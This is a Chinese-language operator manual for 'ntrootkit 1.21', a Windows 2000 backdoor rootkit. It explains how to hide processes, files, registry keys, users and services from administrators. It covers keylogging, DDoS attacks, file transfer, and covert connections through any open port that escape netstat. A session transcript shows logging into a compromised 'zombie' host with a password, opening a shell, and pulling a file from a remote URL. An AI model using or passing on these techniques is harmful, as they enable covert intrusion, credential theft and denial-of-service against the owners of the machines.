yyt_hac's ntrootkit 1.21 使用说明 一、简介 本ntrootkit采用无连接协议,不开端口,有四种协议可以选择(0:userdefined,1:icmp,2:udp,3:tcp),注意第三种 方式,它只是使用了tcp数据包进行通讯,并没有建立tcp连接,用这种方式只要把目标端口设置成任意一个目标机器上 开的端口,一般都会成功的机会很大。它隐藏进程,文件,目录,服务,注册表项和用户,提供一些很有用的命令。由 于该rootkit有ddos功能,请不要公开传播!如果已经安装了ntrootkit 1.0,必须用'-i'选项升级,重起系统后生效。 ntrootkit 1.1版增加了远程安装,ddos,键盘记录功能,该版本不公开,需要的可向我要。 ntrootkit 1.2版相对于1.1版做了如下改进: 1.修改不能进行键盘记录的bug 2.增加隐藏用户的命令 3.增加system命令,可以在不开命令行窗口的情况下执行外部命令,用system函数运行命令时会弹出命令行窗口, 因此改为用winexec执行,而这个函数不能执行系统内部命令,如dir等。 4.增加配置文件,可以自己配置rootkit,在下面有详细说明 5.隐藏的东西在3389终端中也看不到,注意:用hide系列命令添加的隐藏项在3389终端中不会马上被隐藏,而是在 重新连接终端后隐藏,在配置文件中添加的隐藏项在3389终端中安装完rootkit就能隐藏。 6.增加getsysinfo 命令,可以得到远程机器的一些基本信息 7.增加用fport也看不到被隐藏进程及其开的端口的功能 8.连接密码和网络通讯都进行加密 9.连接异常退出后不需要等几分钟,可以马上连接,但是客户端的ip和连接类型不能改变。 ntrootkit 1.21版相对于1.2版主要增加一种新的连接方式,非常强大,它使得用户可以使用任何一种telnet工具连接 到肉鸡如何一个开的端口上,如139,445,80等,不影响原来端口的功能,而且在肉鸡上用netstat看不到rootkit建立的 连接。 二、使用环境 Windows 2000系列操作系统(包括客户端和服务器端) 三、使用步骤 可以设置rootkit启动后的进程名,在ntrootkit.ini文件里,有 appname=comine.exe 其中comine.exe就是设置的进程名,你可以根据需要修改 下面主要说明新的连接方式的使用(以telnet为例,其它的工具连接方式都一样) 为了在本地回显你输入的命令,必须把本地回显选项打开,方法如下: G:\tools\hack\letmein>telnet //运行telnet Microsoft (R) Windows 2000 (TM) 版本 5.00 (内部版本号 2195) 欢迎使用 Microsoft Telnet Client Telnet Client 内部版本号 5.00.99206.1 Escape 字符为 'CTRL+]' Microsoft Telnet> set LOCAL_ECHO //设置本地回显 Microsoft Telnet> quit G:\tools\hack\letmein>telnet 192.8.8.66 135 //连接到肉鸡任何一个开的端口上 !!!PASSWORD yyt_hac111 //输入密码,!!!PASSWORD是固定要输的,yyt_hac111是连接密码 Welcome to yyt_hac's ntrootkit Server 1.21 public version,use '?' command to get command list CMD>? ********yyt_hac's ntrootkit Server Command List******** ?-------------------------------Show this list HideFileDir [FileName or DIR]----------------------Hide the file or directory(no para will show all file or directory been hidden) HideProcId [pid]----------------Hide process with the id HideProcName [procname]---------Hide process with the process name HideKey [KeyName]---------------Hide the registry key HideValue [ValueName]-----------Hide the registry value HideUser [UserName]-------------Hide the User HideServ [ServiceName]----------Hide the Service ShowFileDir FileName or DIR-----UnHide the file or directory that been hidden be fore ShowProcId pid------------------UnHide the process that been hidden before with the id ShowProcName procname-----------UnHide the process that been hidden before with the process name ShowKey KeyName-----------------UnHide the registry key ShowValue ValueName-------------UnHide the registry value ShowUser UserName---------------UnHide the user that been hidden before ShowServ ServiceName------------UnHide the service that been hidden before Get RemoteFilePath [LocalFilePath]----Get the remote file to local computer Put LocalFilePath [RemoteFilePath]----Put the local file to remote computer KeyLogOn------------------------------Start key log KeyLogOff-----------------------------Stop key log DDOS DDos_Destip [DDos_Destport DDos_type DDos_seconds DDos_ProcCount]---DDos th e destip SDDOS---------------------------------Stop DDos GetPwd [LocalFilePath]----------------Get the ntrootkit keylog password file to local computer DelPwd--------------------------------Del the ntrootkit keylog password file Ps------------------------------------Show all processes on remote machine Kill pid------------------------------Kill the process with the id or name RTVer---------------------------------Show Ntrootkit server version and author i nfo SetPass [NewPassword]-----------------Change or show the connection password Reboot--------------------------------Reboot the targer computer OpenShell-----------------------------Open a command shell system command------------------------excute command use system fuction getsysinfo----------------------------get remote system infomation getfile URL [LocalFileName]-----------get file from the URL to LocalFileName Exit----------------------------------Exit the shell or rootkit CMD>rtver The ntrootkit version is 1.21 public version, welcome to http://www.yythac.com CMD>hideuser The Hide User: CMD>getsysinfo Number of CPU:1 Type of CPU:Intel Pentium III or high System Version:Windows nt 5.0 build:2195 Service Pack:3.0 Product type:Windows 2000 Server Computer Name:YYTHAC System Dir:C:\WINNT\system32 CMD>openshell Microsoft Windows 2000 [Version 5.00.2195] (C) 版权所有 1985-2000 Microsoft Corp. C:\WINNT\system32>cd \ cd \ C:\>getfile http://www.yythac.com/softdown/pslist.exe c:\pslist.exe getfile successfully! C:\>net user net user \\ 的用户帐户 ------------------------------------------------------------------------------- __vmware_user__ ACTUser ASPNET Guest IUSR_EIS-ZH IWAM_EIS-ZH root SQLDebugger TsInternetUser VUSR_EIS-ZH VUSR_YYT_HAC 命令运行完毕,但发生一个或多个错误。 C:\>exit CMD>exit exit successfully G:\tools\hack\letmein> 四、错误报告 如果你发现了bug,请把rootkit安装目录下的rtkit.log文件和出现的现象发email给我,rtkit.log只是便于我找出错的, 原因,不会记录你私人的信息,谢谢! 连接注意事项: 1、用nc连接时不能连接139端口。 2、用telnet等工具连接时,不能每次都连接成功,多试几次。 3、自己的机器上安装了rootkit,则第三种连接方式(tcp数据包)连接不能成功。 五、和我联系 个人主页:http://www.yythac.com Email:webmaster@yythac.com QQ:47090005 icq:272288117